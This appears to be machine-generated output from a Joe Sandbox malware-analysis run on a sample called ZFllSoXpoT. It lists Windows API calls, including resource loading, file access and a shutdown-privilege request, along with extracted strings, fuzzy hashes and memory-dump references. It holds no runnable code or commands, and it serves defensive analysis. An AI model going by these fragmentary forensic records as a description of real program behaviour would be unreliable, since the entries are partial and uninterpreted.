                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                            APIs
                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrev
                                                                            • String ID:
                                                                            • API String ID: 122130370-0
                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                            • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                            • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                            • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 107509674-3733053543
                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                            • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                            • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                            • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                            • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                            • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                            • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: SystemTime
                                                                            • String ID:
                                                                            • API String ID: 2656138-0
                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                            • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                            • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                            • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-2401316094
                                                                            • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                            • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                            • LocalFree.KERNEL32(0059FB70,00000000,00401AB4), ref: 00401A1B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0059FB70,00000000,00401AB4), ref: 00401A3A
                                                                            • LocalFree.KERNEL32(0059DDB8,?,00000000,00008000,0059FB70,00000000,00401AB4), ref: 00401A79
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID: Y
                                                                            • API String ID: 3782394904-1754117475
                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                              • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                            • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                            • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                            • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ExitMessageProcess
                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                            • API String ID: 1220098344-1503883590
                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID: Y
                                                                            • API String ID: 730355536-1754117475
                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                            • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                            • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: U1hd.@$'X
                                                                            • API String ID: 2123368496-764149186
                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014B2
